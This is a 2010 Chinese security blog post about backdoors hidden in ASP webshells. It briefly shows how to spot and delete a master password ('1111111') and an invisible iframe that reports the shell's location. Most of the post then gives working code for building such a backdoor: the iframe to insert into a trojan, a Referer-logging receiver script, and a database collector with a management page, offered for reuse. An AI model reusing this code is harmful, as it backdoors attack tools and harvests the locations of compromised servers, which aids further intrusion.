webshell插后门问题

发布:si1ence | 分类:网络安全 | 浏览:

16 Apr 2010

经过测试发现是在webshell插入
<iframe src=http://127.0.0.1/missend.asp width=0 height=0></iframe>
当别人使用我们的webshell的时候就会暗地的访问我们的这个收信地址
收信文件是
<%
url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline urlfile.close
set file=nothing
set fs=nothing
%>
就是将我们的马的地址保存为 bobo.txt (大概就是这个意思)
 

是不是可以给WEBSHELL加2个密码!

都可以进去的···

一个是默认密码

一个是后门密码!

解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录

正常的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION
IF SEssIoN("web2a2dmin")<>UsERpaSs thEn
IF requeSt.FoRM("pass")<>"" TheN
iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then
SEsSIoN("web2a2dmin")=uSERPAss
rESPOnsE.rEdirEct Url
ELse
rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就好了吧。

下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!


大家后门的原理:

这是一段收信的asp代码将其保存为1.asp

<%url=Request.ServerVariables("HTTP_Referer")
set fs=server.CreateObject("Scripting.FileSystemObject")
set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)
file.writeline url
file.close
set file=nothing
set fs=nothing
%>

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用

<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>

插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

 

webshell后门所有版

不多说了 自己看代码吧


<%
Dim Conn
Dim ConnStr
Db="info.mdb" '数据库文件位置
On Error Resume Next
Connstr="DBQ="+Server.Mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Conn=Server.Createobject("ADODB.CONNECTION")
Conn.open ConnStr
Set rs = Server.CreateObject("ADODB.Recordset")
If Err Then
        'Err.Clear
        Set Conn = Nothing
        Response.Write "数据库连接出错,请检查Conn.asp文件中的数据库参数设置。"
        Response.End
    End If
   
url=Request.ServerVariables("HTTP_Referer")

 

if url<>"" Then
sql = "select * from xxxx"
        rs.Open sql, Conn, 1, 3
        rs.addnew
        rs("url") = url
        rs("time") = now()
        rs.Update
end if
%>


<%
Dim Conn
Dim ConnStr
Db="info.mdb" '数据库文件位置
On Error Resume Next
Connstr="DBQ="+Server.Mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Conn=Server.Createobject("ADODB.CONNECTION")
Conn.open ConnStr
Set rs = Server.CreateObject("ADODB.Recordset")
If Err Then
        'Err.Clear
        Set Conn = Nothing
        Response.Write "数据库连接出错,请检查Conn.asp文件中的数据库参数设置。"
        Response.End
    End If
   
Sub AlertAndGoto(strMsg, strUrl)
   Response.Write "<script language=""javascript"">" & vbCrLf
   Response.Write "   alert('" & strMsg & "');" & vbCrLf
   Response.Write "   window.location.href='" & strUrl & "';" & vbCrLf
   Response.Write "</script>" & vbCrLf
   Response.end
End Sub
if request("action")="Del" Then
id = clng(Request("id"))
//response.write id:response.end
Conn.execute("DELETE FROM [xxxx] WHERE id="&id)
url=Request.ServerVariables("HTTP_Referer")
AlertAndGoto OpTitle & "漏洞记录成功!", url
end if
%><title>Manage</title>
<style type="text/css">
<!--
.STYLE1 {color: #FF0000}
a:link {
    color: #FF0000;
}
-->
</style>

 

<table width="761" border="1" align="center">
  <tr>
    <td width="60">id</td>
    <td width="438">url</td>
    <td width="153">time</td>
    <td width="82">Operation</td>
  </tr>
  <tr>
  <%
  Dim sql
sql = "select * from xxxx order by ID"
rs.open sql,conn,1,1
If rs.BOF And rs.EOF Then
        Response.Write "没有任何记录"
    Else
RS.PageSize =10
  if request.querystring("pagenum")="" then
     pagenum=1
  else
     pagenum=clng(request.querystring("pagenum"))
  end if
  RS.absolutepage=pagenum
  I = RS.PageSize
Do While Not rs.EOF and I>0
  I =I-1
%>
    <td><%=rs("id")%></td>
    <td><%=Server.HTMLEncode(rs("url"))%></td>
    <td><%=rs("time")%></td>
    <td align="center"><span class="STYLE1"><a href="read.asp?Action=Del&id=<%=rs("id")%>" onClick="return confirm('确定要删除此记录吗?');">删除</a></span></td>
  </tr>
  <%
  RS.MoveNext                                             
    loop
    End If
    %>
    <tr>
    <td colspan="4" align="center"><%
   
  response.write"共"&RS.recordcount&"条记录,第"&pagenum&"/"&RS.pagecount&"页  "
  if pagenum=1 then
    response.write "[上一页]"
  else
  %>
[<a href=read.asp?pagenum=<%=pagenum-1%>>上一页</a>]
<%
end if
if pagenum=RS.pagecount then
  response.write "[下一页]"
else
%>
[<a href=read.asp?pagenum=<%=pagenum+1%>>下一页</a>]
<%
end if
if pagenum>1 then
%>
[<a href=read.asp?pagenum=1>首页</a>]
<%
else
response.write "[首页]"
end if
if pagenum<RS.pagecount then
%>
[<a href=read.asp?pagenum=<%=RS.pagecount%>>尾页</a>]
  <%
  else
response.write "[尾页]"
end if
%></td>
  </tr>
</table>

 


分享到:

原创文章如转载,请注明:转载自si1ence'blog [ http://www.si1ence.cn/ ]
本文链接地址:http://www.si1ence.cn/wangluoanquan/22/

上一篇:
本地测试博客时iis问题
下一篇:
2010年4月16日最新eset nod32激活码 nod32注册码 nod32升级ID
  • 相关文章:

0评论 - webshell插后门问题

发表评论

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于

关注网络安全,掌握网络资讯与病毒防,IT资讯,搜索引擎优化(SEO)技术分?Emai:master#si1ence.cn(#改为@)

TAGS列表

最近发表

随机文章

本月浏览排行

最近评论

CopyRight @2002-2011 si1ence, Inc. All Rights Reserved.

si1ence's blog 主题提供: si1ence